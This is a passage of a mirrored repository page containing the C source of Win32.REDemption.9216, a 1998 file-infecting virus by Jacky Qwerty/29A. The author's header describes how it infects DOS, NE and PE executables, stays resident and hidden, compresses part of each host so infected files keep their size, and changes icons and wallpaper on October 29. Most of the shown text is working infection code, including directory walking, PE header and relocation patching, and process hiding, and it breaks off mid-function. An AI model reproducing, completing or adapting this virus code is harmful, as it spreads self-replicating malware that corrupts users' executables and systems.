mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 08:15:27 +00:00
1831 lines
59 KiB
NASM
1831 lines
59 KiB
NASM
????????????????????????????????????????????????????????????????[win32red.c]??
|
|
/*
|
|
Win32.REDemption.9216 virus.
|
|
(c) 1998. Jacky Qwerty/29A.
|
|
|
|
Description
|
|
|
|
This is a resident HLL (High Level Language) Win32 appender virus
|
|
written in C. It infects all sort of EXE files: DOS EXE files, NE files,
|
|
PE files from Win32 (Win95/NT), etc. Infected files only spread in Win32
|
|
platforms, including Win3.x with Win32s subsystem. The virus infects
|
|
EXE files by changing the pointer at 3Ch in the MZ header which points
|
|
to the new EXE header (if any) placing another pointer to the virus own
|
|
PE header attached at the end of the file. When the virus executes, it
|
|
infects all EXE files from Windows, System and current folder. Then it
|
|
spawns itself as another task (thus staying resident), makes itself
|
|
invisible (thus becoming unloadable) and periodically searches for non-
|
|
infected EXE files in all drives, infecting them in the background.
|
|
|
|
Most interesting feature of this virus is that infected files don't
|
|
grow at all, that is, files have same size before and after infection.
|
|
The virus compresses part of its host by using own JQCODING algorithm.
|
|
It also copies host icon to its own resource section to show original icon.
|
|
The virus has no problems related to finding the KERNEL32 base address
|
|
and its API functions. This is because all API functions are imported
|
|
implicitly from the virus own import table. The virus takes special care
|
|
of patching appropriately all RVA and RAW fields from its own PE header,
|
|
including code, data, imports, relocations and resource sections. This
|
|
is needed for the virus to spread succesfully through all kinds of hosts.
|
|
|
|
Payload
|
|
|
|
On October the 29th, the virus replaces the main icon of all infected
|
|
programs with its own icon, a 29A logo. It also changes default
|
|
desktop wallpaper to such logo.
|
|
|
|
To build
|
|
|
|
Just run the BUILD.BAT file to build release version. VC++ 6.0 compiler
|
|
was used since it proved to optimize better than Borland's or Watcom's.
|
|
|
|
Greets go to
|
|
|
|
All 29Aers..... for all the work quality and effort during this #3 issue,
|
|
keep up the good work dudes!
|
|
b0z0........... for such invaluable feedback during betatesting, thanks
|
|
a lot man, you rock!
|
|
My gf Carol.... who's been pushing me to quit the scene, but still not
|
|
enough, i.o.u. #8).
|
|
Rajaat/Sandy... Hey we all miss you.. come back to 29A!
|
|
|
|
Disclaimer
|
|
|
|
This source code is provided for educational purposes only. The author is
|
|
NOT responsible in any way, for problems it may cause due to improper use!
|
|
|
|
(c) 1998. Jacky Qwerty/29A.
|
|
*/
|
|
|
|
#define WIN32_LEAN_AND_MEAN
|
|
|
|
#include
|
|
|
|
#ifdef tsr
|
|
#include "win95sys.h"
|
|
#endif
|
|
|
|
#ifdef compr
|
|
#include "jqcoding.h"
|
|
#endif
|
|
|
|
#ifdef icon
|
|
#include "winicons.h"
|
|
#include "winres.h"
|
|
#endif
|
|
|
|
|
|
//constants..
|
|
|
|
#ifdef _MSC_VER // Microsoft VC++
|
|
# ifdef release
|
|
# define DATA_SECTION_RAW 0x200 //0xE00
|
|
# else
|
|
# define DATA_SECTION_RAW 0x1400 //0x1600
|
|
# endif
|
|
# define COMPILER_DATA 0 //0x30 (VC++4)
|
|
# define SIZEOF_RESOURCE_DATA 0x504
|
|
#endif
|
|
|
|
#ifdef __BORLANDC__ // Borland C++
|
|
# ifdef release
|
|
# define DATA_SECTION_RAW ? //0x1000
|
|
# define COMPILER_DATA 0
|
|
# else
|
|
# define DATA_SECTION_RAW ? //0x6200
|
|
# define COMPILER_DATA 0x74
|
|
# endif
|
|
# define SIZEOF_RESOURCE_DATA ?
|
|
#endif
|
|
|
|
#define VIRUS_SIZE (FILE_SIZE - PE_HEADER_OFFSET)
|
|
|
|
#define STARTOF_CODEDATA (DATA_SECTION_RAW + COMPILER_DATA -\
|
|
PE_HEADER_OFFSET)
|
|
#define RawSelfCheck (STARTOF_CODEDATA + sizeof(szCopyright) - 5)
|
|
|
|
#define INIT_VARS_OFFSET (STARTOF_CODEDATA + sizeof(szCopyright) +\
|
|
sizeof(szExts) + 3 & -4)
|
|
#ifdef tsr
|
|
#define RawProgType INIT_VARS_OFFSET
|
|
#define RawSrcVir (RawProgType + 4)
|
|
#else
|
|
#define RawSrcVir INIT_VARS_OFFSET
|
|
#endif
|
|
#define RawOldPtr2NewEXE (RawSrcVir + 4)
|
|
#define RawOldFileSize (RawOldPtr2NewEXE + 4)
|
|
#ifdef compr
|
|
#define RawnComprSize (RawOldFileSize + 4)
|
|
#define RawCipherTarget (RawnComprSize + 4)
|
|
#define TmpVal RawCipherTarget
|
|
#else
|
|
#define TmpVal RawOldFileSize
|
|
#endif
|
|
#ifdef icon
|
|
#define RawOldResourceAddr (TmpVal + 4)
|
|
#endif
|
|
|
|
#ifndef compr
|
|
#define SIZE_PAD 101
|
|
#endif
|
|
#define READ_ONLY FALSE
|
|
#define WRITE_ACCESS TRUE
|
|
#define SIZEOF_FILEEXT 3
|
|
#define MAX_FILESIZE 0x4000000 //64 MB
|
|
#ifdef compr
|
|
#define MIN_FILESIZE 0x4000 //16 KB
|
|
#endif
|
|
#define PREV_LAPSE 3 //1 * 60 //10 * 60 //seconds
|
|
#define SEEK_LAPSE 3 //5 //30 //seconds
|
|
|
|
|
|
//macros..
|
|
|
|
#define Rva2Ptr(Type, Base, RVA) ((Type)((DWORD)(Base) + (DWORD)(RVA)))
|
|
|
|
#define IsFile(pFindData) (!((pFindData)->dwFileAttributes &\
|
|
FILE_ATTRIBUTE_DIRECTORY))
|
|
#define IsFolder(pFindData) (!IsFile(pFindData) &&\
|
|
(pFindData)->cFileName[0] != '.')
|
|
|
|
#define PushVar(Object) __asm push (Object)
|
|
#define PopVar(Object) __asm pop (Object)
|
|
|
|
|
|
//type definitions..
|
|
|
|
#ifdef tsr
|
|
typedef BYTE PROG_TYPE, *PPROG_TYPE;
|
|
#define TSR_COPY 0
|
|
#define HOST_COPY 1
|
|
#endif
|
|
|
|
typedef BYTE BOOLB;
|
|
|
|
typedef struct _IMAGE_RELOCATION_DATA { // not defined in winnt.h
|
|
WORD RelocOffset :12;
|
|
WORD RelocType :4;
|
|
} IMAGE_RELOCATION_DATA, *PIMAGE_RELOCATION_DATA;
|
|
|
|
#ifdef icon
|
|
typedef struct _ICONIMAGES {
|
|
PICONIMAGE pLargeIcon;
|
|
PICONIMAGE pSmallIcon;
|
|
} ICONIMAGES, *PICONIMAGES;
|
|
#endif
|
|
|
|
|
|
//global variables..
|
|
|
|
BYTE szCopyright[] = "(c) Win32.REDemption (C ver.1.0) by JQwerty/29A",
|
|
szExts[] = "eXeSCr";
|
|
#ifdef tsr
|
|
PROG_TYPE ProgType = HOST_COPY;
|
|
#endif
|
|
DWORD SrcVir = PE_HEADER_OFFSET, OldPtr2NewEXE = 1, OldFileSize = FILE_SIZE;
|
|
#ifdef compr
|
|
DWORD nComprSize = 1, CipherTarget = 1;
|
|
#endif
|
|
#ifdef icon
|
|
DWORD OldResourceAddr = RESOURCE_SECTION_RVA;
|
|
#include "jq29aico.h"
|
|
#endif
|
|
DWORD ExitCode = 0;
|
|
#ifndef compr
|
|
DWORD _TgtVir;
|
|
#else
|
|
DWORD CipherSource;
|
|
#endif
|
|
DWORD _RvaDelta;
|
|
HANDLE hHandle1, hHandle2;
|
|
BYTE PathName[MAX_PATH], HostName[MAX_PATH], TmpName[MAX_PATH];
|
|
WIN32_FIND_DATA FindData, FindDataTSR;
|
|
STARTUPINFO StartupInfo = { 0 };
|
|
PROCESS_INFORMATION ProcessInfo;
|
|
PIMAGE_DOS_HEADER pMZ, pHostMZ;
|
|
PIMAGE_NT_HEADERS _pHostPE;
|
|
#ifdef msgbox
|
|
BOOLB CancelFolderSeek = FALSE, CancelFileSeek = FALSE;
|
|
#ifdef tsr
|
|
HANDLE hMutex;
|
|
#endif
|
|
#endif
|
|
#ifdef icon
|
|
BOOLB bPayLoadDay = FALSE;
|
|
PIMAGE_RESOURCE_DIRECTORY pRsrcStart;
|
|
BYTE HostLargeIcon[SIZEOF_LARGE_ICON];
|
|
BYTE HostSmallIcon[SIZEOF_SMALL_ICON];
|
|
#endif
|
|
#ifdef compr
|
|
BYTE ComprMem[0x10000];
|
|
#ifdef icon
|
|
#define SIZEOF_BMP 0x8076 //32Kb + Bitmap header..
|
|
BYTE jq29aBmp[SIZEOF_BMP] = { 0 };
|
|
#endif
|
|
#endif
|
|
|
|
#define sz29A (szCopyright + sizeof(szCopyright) - 4)
|
|
#define szJQ (szCopyright + sizeof(szCopyright) - 12)
|
|
|
|
|
|
//function declarations..
|
|
|
|
VOID Win32Red(VOID);
|
|
BOOLB OpenMapFile(PBYTE FileName, BOOLB WriteAccess);
|
|
VOID CloseTruncFile(BOOLB WriteAccess);
|
|
VOID InfectPath(PBYTE PathName, DWORD cBytes);
|
|
VOID CloseUnmapFile(BOOLB WriteAccess);
|
|
PBYTE GetEndOfPath(PBYTE pTgt, PBYTE pSr);
|
|
PVOID Rva2Raw(DWORD Rva);
|
|
#ifdef icon
|
|
VOID FixResources(PIMAGE_RESOURCE_DIRECTORY pRsrcDir);
|
|
VOID GetDefaultIcons(PICONIMAGES pIconImages,
|
|
PVOID pNEorPE);
|
|
#endif
|
|
#ifdef tsr
|
|
VOID ExecTemp(PROG_TYPE ProgType);
|
|
__inline VOID SeekTSR(VOID);
|
|
VOID WalkFolder(PBYTE PathName);
|
|
VOID HideProcess(VOID);
|
|
__inline PPROCESS_DATABASE GetProcessDB(VOID);
|
|
__inline PTHREAD_DATABASE GetThreadDB(VOID);
|
|
#else
|
|
__inline VOID ExecTemp(VOID);
|
|
#endif
|
|
|
|
|
|
//function definitions..
|
|
|
|
VOID Win32Red() {
|
|
#ifdef tsr
|
|
#ifndef msgbox
|
|
HANDLE hMutex;
|
|
#endif
|
|
HideProcess();
|
|
#endif
|
|
#ifdef icon
|
|
#include "payload.c"
|
|
#endif
|
|
if (GetModuleFileName(0, HostName, MAX_PATH) &&
|
|
OpenMapFile(HostName, READ_ONLY)) {
|
|
pHostMZ = pMZ;
|
|
PushVar(hHandle1); //better pushin/popin than usin a temp. var.
|
|
PushVar(hHandle2); //better pushin/popin than usin a temp. var.
|
|
SrcVir += (DWORD)pMZ;
|
|
#ifdef tsr
|
|
if (ProgType != TSR_COPY) {
|
|
#ifdef msgbox
|
|
MessageBox(NULL, "Non-resident stage..", szCopyright, MB_OK);
|
|
#endif
|
|
#endif
|
|
#ifdef compr
|
|
PushVar(nComprSize);
|
|
PushVar(CipherTarget);
|
|
#endif
|
|
InfectPath(PathName, GetWindowsDirectory(PathName, 0x7F));
|
|
InfectPath(PathName, GetSystemDirectory(PathName, 0x7F));
|
|
InfectPath(PathName, (*PathName = '.', 1));
|
|
#ifdef compr
|
|
PopVar(CipherTarget);
|
|
PopVar(nComprSize);
|
|
#endif
|
|
#ifdef tsr
|
|
}
|
|
else {
|
|
if ((hMutex = CreateMutex(NULL, FALSE, szJQ)))
|
|
if (GetLastError() == ERROR_ALREADY_EXISTS)
|
|
#if 1
|
|
#ifdef msgbox
|
|
MessageBox(NULL, "TSR: Mutex exists!", szCopyright, MB_OK),
|
|
#endif
|
|
#endif
|
|
CloseHandle(hMutex),
|
|
ExitProcess(ExitCode);
|
|
#if 1
|
|
#ifdef msgbox
|
|
else
|
|
MessageBox(NULL, "TSR: Mutex created!", szCopyright, MB_OK);
|
|
#endif
|
|
#endif
|
|
#ifdef msgbox
|
|
MessageBox(NULL, "Resident stage..", szCopyright, MB_OK);
|
|
#endif
|
|
SeekTSR();
|
|
#ifdef msgbox
|
|
MessageBox(NULL, "TSR: bye bye..", szCopyright, MB_OK);
|
|
#endif
|
|
}
|
|
#endif
|
|
PopVar(hHandle2); //better pushin/popin than usin a temp. var.
|
|
PopVar(hHandle1); //better pushin/popin than usin a temp. var.
|
|
pMZ = pHostMZ;
|
|
CloseUnmapFile(READ_ONLY);
|
|
#ifdef tsr
|
|
if (ProgType != TSR_COPY) {
|
|
if ((hMutex = OpenMutex(MUTEX_ALL_ACCESS, FALSE, szJQ)))
|
|
#ifndef msgbox
|
|
CloseHandle(hMutex);
|
|
#else
|
|
CloseHandle(hMutex),
|
|
MessageBox(NULL, "HOST: Mutex exists!", szCopyright, MB_OK);
|
|
#endif
|
|
else
|
|
if (GetTempPath(MAX_PATH, PathName) - 1 < MAX_PATH - 1)
|
|
#ifdef msgbox
|
|
MessageBox(NULL, "HOST: Mutex doesn't exist!",
|
|
szCopyright, MB_OK),
|
|
#endif
|
|
ExecTemp(TSR_COPY);
|
|
GetEndOfPath(PathName, HostName);
|
|
ExecTemp(HOST_COPY);
|
|
}
|
|
#else
|
|
GetEndOfPath(PathName, HostName);
|
|
ExecTemp();
|
|
#endif
|
|
}
|
|
ExitProcess(ExitCode);
|
|
}
|
|
|
|
#ifdef tsr
|
|
VOID ExecTemp(PROG_TYPE ProgType) {
|
|
#else
|
|
__inline VOID ExecTemp() {
|
|
#endif
|
|
PBYTE pSrc, szCmdLine;
|
|
HANDLE hFindFile;
|
|
#ifdef compr
|
|
BOOLB DecomprOK = TRUE;
|
|
#endif
|
|
#ifdef tsr
|
|
DWORD cBytes;
|
|
if (ProgType == TSR_COPY) {
|
|
if (PathName[(cBytes = lstrlen(PathName)) - 1] != '\\')
|
|
PathName[cBytes++] = '\\';
|
|
*(PDWORD)(PathName + cBytes) = '*A92';
|
|
*(PDWORD)(PathName + cBytes + 4) = '*.';
|
|
if ((hFindFile = FindFirstFile(PathName, &FindData)) !=
|
|
INVALID_HANDLE_VALUE) {
|
|
do {
|
|
lstrcpy(PathName + cBytes, FindData.cFileName);
|
|
DeleteFile(PathName);
|
|
} while (FindNextFile(hFindFile, &FindData));
|
|
FindClose(hFindFile);
|
|
}
|
|
PathName[cBytes] = '\x0';
|
|
}
|
|
#endif
|
|
if (!(cBytes = lstrlen(PathName),
|
|
GetTempFileName(PathName, sz29A, 0, PathName)) &&
|
|
(GetTempPath(MAX_PATH, PathName) - 1 >= MAX_PATH - 1 ||
|
|
!(cBytes = lstrlen(PathName),
|
|
GetTempFileName(PathName, sz29A, 0, PathName))))
|
|
return;
|
|
if (ProgType != TSR_COPY)
|
|
for (;;) {
|
|
pSrc = PathName + lstrlen(lstrcpy(TmpName, PathName));
|
|
while (*--pSrc != '.'); *(PDWORD)(pSrc + 1) = 'EXE';
|
|
if (MoveFile(TmpName, PathName))
|
|
break;
|
|
DeleteFile(TmpName);
|
|
PathName[cBytes] = '\x0';
|
|
if (!GetTempFileName(PathName, sz29A, 0, PathName))
|
|
return;
|
|
}
|
|
if (CopyFile(HostName, PathName, FALSE) &&
|
|
SetFileAttributes(PathName, FILE_ATTRIBUTE_NORMAL) &&
|
|
(hFindFile = FindFirstFile(HostName, &FindData)) !=
|
|
INVALID_HANDLE_VALUE) {
|
|
if (OpenMapFile(PathName, WRITE_ACCESS)) {
|
|
#ifdef tsr
|
|
if (ProgType != TSR_COPY) {
|
|
#endif
|
|
pMZ->e_lfanew = OldPtr2NewEXE;
|
|
#ifndef compr
|
|
FindData.nFileSizeLow = OldFileSize;
|
|
#else
|
|
#ifdef msgbox
|
|
#if 0
|
|
MessageBox(NULL, "Host decoding is about to start..",
|
|
szCopyright, MB_OK);
|
|
#endif
|
|
#endif
|
|
if (jq_decode(Rva2Ptr(PBYTE, pMZ, OldFileSize),
|
|
Rva2Ptr(PBYTE, pMZ, CipherTarget + nComprSize),
|
|
nComprSize,
|
|
ComprMem) != OldFileSize - CipherTarget) {
|
|
DecomprOK = FALSE;
|
|
#ifdef msgbox
|
|
#if 1
|
|
MessageBox(NULL, "Decode error: File is corrupt!",
|
|
szCopyright, MB_OK);
|
|
#endif
|
|
#if 0
|
|
}
|
|
else {
|
|
MessageBox(NULL, "Host decoded succesfully!",
|
|
szCopyright, MB_OK);
|
|
#endif
|
|
#endif
|
|
}
|
|
#endif
|
|
#ifdef tsr
|
|
}
|
|
else
|
|
*Rva2Ptr(PPROG_TYPE,
|
|
Rva2Ptr(PIMAGE_NT_HEADERS, pMZ, pMZ->e_lfanew),
|
|
RawProgType) = TSR_COPY;
|
|
#endif
|
|
#ifndef compr
|
|
UnmapViewOfFile(pMZ);
|
|
CloseTruncFile(WRITE_ACCESS);
|
|
#else
|
|
CloseUnmapFile(WRITE_ACCESS);
|
|
if (DecomprOK) {
|
|
#endif
|
|
pSrc = GetCommandLine(); while (*++pSrc != 0x20 && *pSrc);
|
|
if ((szCmdLine = (PBYTE)GlobalAlloc(LPTR, MAX_PATH
|
|
+ lstrlen(pSrc) + 1))) {
|
|
lstrcat(lstrcpy(szCmdLine, PathName), pSrc);
|
|
(BYTE)StartupInfo.cb = sizeof(STARTUPINFO);
|
|
if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
|
|
CREATE_NEW_CONSOLE, NULL, NULL,
|
|
&StartupInfo, &ProcessInfo)) {
|
|
#ifdef tsr
|
|
if (ProgType != TSR_COPY) {
|
|
#endif
|
|
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
|
|
GetExitCodeProcess(ProcessInfo.hProcess, &ExitCode);
|
|
CloseHandle(ProcessInfo.hThread);
|
|
CloseHandle(ProcessInfo.hProcess);
|
|
#ifdef tsr
|
|
}
|
|
#endif
|
|
}
|
|
GlobalFree(szCmdLine);
|
|
}
|
|
#ifdef compr
|
|
}
|
|
#endif
|
|
}
|
|
FindClose(hFindFile);
|
|
}
|
|
DeleteFile(PathName);
|
|
}
|
|
|
|
BOOLB OpenMapFile(PBYTE FileName, BOOLB WriteAccess) {
|
|
#ifndef compr
|
|
DWORD NewFileSize;
|
|
#endif
|
|
hHandle1 = CreateFile(FileName,
|
|
WriteAccess
|
|
? GENERIC_READ | GENERIC_WRITE
|
|
: GENERIC_READ,
|
|
FILE_SHARE_READ,
|
|
NULL,
|
|
OPEN_EXISTING,
|
|
FILE_ATTRIBUTE_NORMAL,
|
|
0);
|
|
if (hHandle1 == INVALID_HANDLE_VALUE)
|
|
return FALSE;
|
|
hHandle2 = CreateFileMapping(hHandle1,
|
|
NULL,
|
|
WriteAccess ? PAGE_READWRITE : PAGE_READONLY,
|
|
0,
|
|
#ifdef compr
|
|
0,
|
|
#else
|
|
WriteAccess
|
|
? NewFileSize =
|
|
(((_TgtVir =
|
|
(FindData.nFileSizeLow + 0x1FF &
|
|
-0x200)
|
|
+ PE_HEADER_OFFSET)
|
|
+ (VIRUS_SIZE + SIZE_PAD - 1))
|
|
/ SIZE_PAD) * SIZE_PAD
|
|
: 0,
|
|
#endif
|
|
NULL);
|
|
if (!hHandle2) {
|
|
CloseHandle(hHandle1);
|
|
return FALSE;
|
|
}
|
|
pMZ = MapViewOfFile(hHandle2,
|
|
WriteAccess ? FILE_MAP_WRITE : FILE_MAP_READ,
|
|
0,
|
|
0,
|
|
#ifdef compr
|
|
0
|
|
#else
|
|
WriteAccess ? NewFileSize : 0
|
|
#endif
|
|
);
|
|
if (!pMZ) {
|
|
CloseTruncFile(WriteAccess);
|
|
return FALSE;
|
|
}
|
|
return TRUE;
|
|
}
|
|
|
|
VOID CloseTruncFile(BOOLB WriteAccess) {
|
|
CloseHandle(hHandle2);
|
|
if (WriteAccess) {
|
|
#ifndef compr
|
|
SetFilePointer(hHandle1, FindData.nFileSizeLow, NULL, FILE_BEGIN);
|
|
SetEndOfFile(hHandle1);
|
|
#endif
|
|
SetFileTime(hHandle1, NULL, NULL, &FindData.ftLastWriteTime);
|
|
}
|
|
CloseHandle(hHandle1);
|
|
}
|
|
|
|
VOID InfectPath(PBYTE PathName, DWORD cBytes) {
|
|
PBYTE pSrc, pTgt, pExt, pEndRelocs, pRelocBase;
|
|
#ifdef compr
|
|
PBYTE pComprBuf;
|
|
SYSTEMTIME SystemTime;
|
|
#endif
|
|
DWORD FileExt, TgtVir, RvaDelta, RawDelta, nCount, nSections, nRvas;
|
|
PIMAGE_SECTION_HEADER pSectionHdr;
|
|
PIMAGE_NT_HEADERS pPE, pHostPE;
|
|
PIMAGE_BASE_RELOCATION pRelocs;
|
|
PIMAGE_RELOCATION_DATA pRelocData;
|
|
PIMAGE_IMPORT_DESCRIPTOR pImports;
|
|
PIMAGE_THUNK_DATA pImportData;
|
|
HANDLE hFindFile;
|
|
BOOLB Infect, bValidHeader;
|
|
#ifdef icon
|
|
ICONIMAGES IconImages;
|
|
#endif
|
|
if (0x7F <= cBytes - 1) return;
|
|
if (PathName[cBytes - 1] != '\\') PathName[cBytes++] = '\\';
|
|
*(PDWORD)(PathName + cBytes) = '*.*';
|
|
#ifdef msgbox
|
|
switch (MessageBox(NULL, PathName, szCopyright,
|
|
MB_YESNOCANCEL | MB_ICONEXCLAMATION)) {
|
|
case IDCANCEL:
|
|
CancelFolderSeek = TRUE;
|
|
case IDNO:
|
|
return;
|
|
}
|
|
#endif
|
|
if ((hFindFile = FindFirstFile(PathName, &FindData)) ==
|
|
INVALID_HANDLE_VALUE)
|
|
return;
|
|
do {
|
|
{
|
|
#ifdef compr
|
|
BYTE KeySecond, TmpKeySec;
|
|
#endif
|
|
if (!IsFile(&FindData) || FindData.nFileSizeHigh ||
|
|
#ifdef compr
|
|
FindData.nFileSizeLow < MIN_FILESIZE ||
|
|
#endif
|
|
(FindData.nFileSizeLow & -MAX_FILESIZE) ||
|
|
#ifndef compr
|
|
!(FindData.nFileSizeLow % SIZE_PAD)
|
|
#else
|
|
(FileTimeToSystemTime(&FindData.ftLastWriteTime, &SystemTime),
|
|
TmpKeySec =
|
|
(BYTE)(((BYTE)SystemTime.wYear - (BYTE)SystemTime.wMonth +
|
|
(BYTE)SystemTime.wDay - (BYTE)SystemTime.wHour +
|
|
(BYTE)SystemTime.wMinute ^ 0x6A) & 0x3E),
|
|
KeySecond = TmpKeySec < 60 ? TmpKeySec : TmpKeySec - 4,
|
|
KeySecond == (BYTE)SystemTime.wSecond)
|
|
#endif
|
|
)
|
|
continue;
|
|
#ifdef compr
|
|
(BYTE)SystemTime.wSecond = KeySecond;
|
|
#endif
|
|
}
|
|
pTgt = lstrcpy(PathName + cBytes, FindData.cFileName)
|
|
+ lstrlen(FindData.cFileName);
|
|
FileExt = *(PDWORD)(pTgt - SIZEOF_FILEEXT) & ~0xFF202020;
|
|
pExt = szExts;
|
|
do {
|
|
if (FileExt != (*(PDWORD)pExt & ~0xFF202020) ||
|
|
pTgt[- 1 - SIZEOF_FILEEXT] != '.' ||
|
|
!OpenMapFile(PathName, READ_ONLY))
|
|
continue;
|
|
Infect = FALSE;
|
|
#ifdef compr
|
|
pComprBuf = NULL;
|
|
#endif
|
|
if (pMZ->e_magic == IMAGE_DOS_SIGNATURE) {
|
|
bValidHeader = FALSE;
|
|
pPE = Rva2Ptr(PIMAGE_NT_HEADERS, pMZ, pMZ->e_lfanew);
|
|
if ((DWORD)pMZ < (DWORD)pPE &&
|
|
(DWORD)pPE < Rva2Ptr(DWORD,
|
|
pMZ,
|
|
FindData.nFileSizeLow)
|
|
- 0x7F &&
|
|
(bValidHeader = TRUE,
|
|
pPE->Signature == IMAGE_NT_SIGNATURE &&
|
|
*Rva2Ptr(PDWORD, pPE, RawSelfCheck) == 'A92/')) {
|
|
} else {
|
|
#ifndef compr
|
|
Infect = TRUE;
|
|
#else
|
|
{
|
|
DWORD nMaxComprSize;
|
|
if ((pComprBuf =
|
|
(PBYTE)GlobalAlloc(
|
|
LPTR,
|
|
nMaxComprSize =
|
|
FindData.nFileSizeLow / 8 * 9 + 12
|
|
)
|
|
)) {
|
|
#ifdef msgbox
|
|
#if 0
|
|
MessageBox(NULL, "Host encoding is about to start..",
|
|
FindData.cFileName, MB_OK);
|
|
#endif
|
|
#endif
|
|
nComprSize =
|
|
jq_encode(pComprBuf + nMaxComprSize,
|
|
Rva2Ptr(PBYTE, pMZ, FindData.nFileSizeLow),
|
|
FindData.nFileSizeLow - sizeof(IMAGE_DOS_HEADER),
|
|
ComprMem);
|
|
TgtVir = (CipherTarget + nComprSize - PE_HEADER_OFFSET
|
|
+ 0x1FF & -0x200) + PE_HEADER_OFFSET;
|
|
if (TgtVir + VIRUS_SIZE - 1 < FindData.nFileSizeLow)
|
|
#ifdef msgbox
|
|
#if 0
|
|
MessageBox(NULL, "Host encoded succesfully!",
|
|
FindData.cFileName, MB_OK),
|
|
#endif
|
|
#endif
|
|
Infect = TRUE;
|
|
#ifdef msgbox
|
|
#if 0
|
|
else
|
|
MessageBox(NULL, "Host encoded succesfully, but "
|
|
"Win32.RED code didn't fit, "
|
|
"skipping file..",
|
|
FindData.cFileName, MB_OK);
|
|
#endif
|
|
#endif
|
|
}
|
|
}
|
|
#endif
|
|
}
|
|
}
|
|
CloseUnmapFile(READ_ONLY);
|
|
if (!Infect || !SetFileAttributes(PathName, FILE_ATTRIBUTE_NORMAL)) {
|
|
#ifdef compr
|
|
if (pComprBuf) GlobalFree(pComprBuf);
|
|
#endif
|
|
continue;
|
|
}
|
|
#ifdef msgbox
|
|
switch (MessageBox(NULL, PathName, szCopyright,
|
|
MB_YESNOCANCEL | MB_ICONEXCLAMATION)) {
|
|
case IDCANCEL:
|
|
CancelFileSeek = TRUE; break;
|
|
case IDYES:
|
|
#endif
|
|
if (OpenMapFile(PathName, WRITE_ACCESS)) {
|
|
#ifdef icon
|
|
IconImages.pLargeIcon = NULL;
|
|
IconImages.pSmallIcon = NULL;
|
|
if (!bPayLoadDay && bValidHeader) {
|
|
GetDefaultIcons(&IconImages,
|
|
Rva2Ptr(PVOID, pMZ, pMZ->e_lfanew));
|
|
if (IconImages.pLargeIcon) {
|
|
pSrc = (PBYTE)IconImages.pLargeIcon;
|
|
pTgt = HostLargeIcon;
|
|
nCount = SIZEOF_LARGE_ICON;
|
|
do *pTgt++ = *pSrc++; while (--nCount);
|
|
if (IconImages.pSmallIcon) {
|
|
pSrc = (PBYTE)IconImages.pSmallIcon;
|
|
nCount = SIZEOF_SMALL_ICON;
|
|
do *pTgt++ = *pSrc++; while (--nCount);
|
|
}
|
|
}
|
|
}
|
|
#endif
|
|
#ifdef compr
|
|
pTgt = Rva2Ptr(PBYTE, pMZ, CipherTarget);
|
|
pSrc = (PBYTE)CipherSource;
|
|
nCount = nComprSize;
|
|
do *pTgt++ = *pSrc++; while (--nCount);
|
|
GlobalFree(pComprBuf); pComprBuf = NULL; //This line is optional
|
|
_pHostPE = pHostPE = Rva2Ptr(PIMAGE_NT_HEADERS,
|
|
pMZ,
|
|
TgtVir);
|
|
#else
|
|
_pHostPE = pHostPE = Rva2Ptr(PIMAGE_NT_HEADERS, //The comented code
|
|
pMZ, // below generates
|
|
TgtVir = _TgtVir); // more bytez than
|
|
#endif // this code becoz
|
|
pTgt = (PBYTE)pHostPE; // the linker adds
|
|
pSrc = (PBYTE)SrcVir; // other functionz
|
|
nCount = VIRUS_SIZE; // not needed!
|
|
do *pTgt++ = *pSrc++; while (--nCount); //
|
|
|
|
// CopyMemory((PBYTE)(pHostPE = Rva2Ptr(PIMAGE_NT_HEADERS, //Not in
|
|
// pMZ, //any DLL
|
|
// TgtVir)), //but in
|
|
// (PBYTE)SrcVir, //a RTL.
|
|
// VIRUS_SIZE); //
|
|
|
|
#ifdef tsr
|
|
if (ProgType == TSR_COPY)
|
|
*Rva2Ptr(PPROG_TYPE, pHostPE, RawProgType) = HOST_COPY;
|
|
#endif
|
|
*Rva2Ptr(PDWORD, pHostPE, RawSrcVir) = TgtVir;
|
|
*Rva2Ptr(PDWORD, pHostPE, RawOldPtr2NewEXE) = pMZ->e_lfanew;
|
|
*Rva2Ptr(PDWORD, pHostPE, RawOldFileSize) = FindData.nFileSizeLow;
|
|
#ifdef compr
|
|
*Rva2Ptr(PDWORD, pHostPE, RawnComprSize) = nComprSize;
|
|
*Rva2Ptr(PDWORD, pHostPE, RawCipherTarget) = CipherTarget;
|
|
#endif
|
|
|
|
_RvaDelta = RvaDelta =
|
|
((pHostPE->OptionalHeader.SizeOfHeaders +=
|
|
(RawDelta = TgtVir - pHostMZ->e_lfanew))
|
|
+ 0xFFF & -0x1000)
|
|
- pHostPE->OptionalHeader.BaseOfCode;
|
|
|
|
// fix RVAs in PE header..
|
|
|
|
pHostPE->OptionalHeader.AddressOfEntryPoint += RvaDelta;
|
|
pHostPE->OptionalHeader.BaseOfCode += RvaDelta;
|
|
pHostPE->OptionalHeader.BaseOfData += RvaDelta;
|
|
pSectionHdr = IMAGE_FIRST_SECTION(pHostPE);
|
|
nSections = pHostPE->FileHeader.NumberOfSections;
|
|
do {
|
|
pSectionHdr->PointerToRawData += RawDelta;
|
|
pSectionHdr++->VirtualAddress += RvaDelta;
|
|
} while (--nSections);
|
|
pHostPE->OptionalHeader.SizeOfImage =
|
|
(pSectionHdr - 1)->VirtualAddress
|
|
+ (pSectionHdr - 1)->Misc.VirtualSize
|
|
+ 0xFFF & -0x1000;
|
|
nRvas = pHostPE->OptionalHeader.NumberOfRvaAndSizes;
|
|
do {
|
|
if (!pHostPE->OptionalHeader.DataDirectory[--nRvas].
|
|
VirtualAddress)
|
|
continue;
|
|
pHostPE->OptionalHeader.DataDirectory[nRvas].
|
|
VirtualAddress += RvaDelta;
|
|
} while (nRvas);
|
|
|
|
// fix RVAs in code & reloc section..
|
|
|
|
pEndRelocs =
|
|
Rva2Ptr(
|
|
PBYTE,
|
|
(pRelocs =
|
|
Rva2Raw(pHostPE->OptionalHeader.
|
|
DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].
|
|
VirtualAddress)),
|
|
pHostPE->OptionalHeader.
|
|
DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].
|
|
Size - IMAGE_SIZEOF_BASE_RELOCATION);
|
|
do {
|
|
pRelocBase = Rva2Raw(pRelocs->VirtualAddress += RvaDelta);
|
|
pRelocData = (PIMAGE_RELOCATION_DATA)(pRelocs + 1);
|
|
(DWORD)pRelocs += pRelocs->SizeOfBlock;
|
|
do {
|
|
